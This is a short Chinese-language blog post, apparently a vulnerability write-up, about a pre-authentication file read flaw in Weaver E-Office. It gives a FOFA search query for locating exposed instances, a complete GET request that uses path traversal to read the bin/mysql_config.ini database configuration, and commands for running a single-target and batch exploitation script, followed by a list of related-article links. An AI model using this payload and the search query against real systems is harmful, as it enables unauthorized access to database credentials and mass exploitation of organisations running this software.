泛微E-Office前台文件读取漏洞

一、漏洞描述

泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化,提高工作效率和管理质量,降低管理成本,为企业提供全面、高效、便捷的办公服务。

泛微E-Office前台文件读取漏洞。

二、网络空间搜索引擎查询

fofa查询

复制代码
 app="泛微-EOffice"

三、漏洞复现

poc

复制代码
GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

浏览器直接访问返回如下

四、批量检测与利用

单个检测与利用

复制代码
 python .\E-OfficeReadfile.py -u http://ip:port

批量检测

复制代码
 python .\E-OfficeReadfile.py -f filename

关注微信公众号 网络安全透视镜 回复 20231008-1 获取批量检测脚本

相关推荐
NOVAnet20235 小时前
云网 + 存储一体化灾备方案解析:南凌科技 × 爱数全景云灾备技术与行业落地价值
科技·web安全·企业数字化·企业sd-wan·混合云网络
Hiyajo pray9 小时前
SDN 访问控制性能调优方法
服务器·网络·网络安全
数据知道13 小时前
网络安全职业规划:从入门到高级安全工程师的路径图
安全·web安全·网络安全·渗透测试·职业规划
Gyr013 小时前
关于证书站捡洞这一档事
安全·web安全
Sagittarius_A*14 小时前
Web 渗透实战:服务器系统识别、端口与中间件全量探测
服务器·网络安全·中间件·渗透测试
网安蟹佬霸14 小时前
我国网络安全人才缺口现状、成因与对策研究
安全·web安全
学逆向的15 小时前
汇编——函数
开发语言·汇编·网络安全
云水一下16 小时前
零基础玩转bWAPP靶场(一):从起源到环境搭建,开启Web安全实战之旅
web安全·靶场·bwapp
HackTwoHub16 小时前
AntiDebug Mcp、AI逆向绕过前端,Hook 加密接口,抓取 Vue 路由漏洞,接入 MCP 让 AI 自动化挖掘前端漏洞
前端·vue.js·人工智能·安全·web安全·网络安全·系统安全
JS_SWKJ16 小时前
【无标题】
网络安全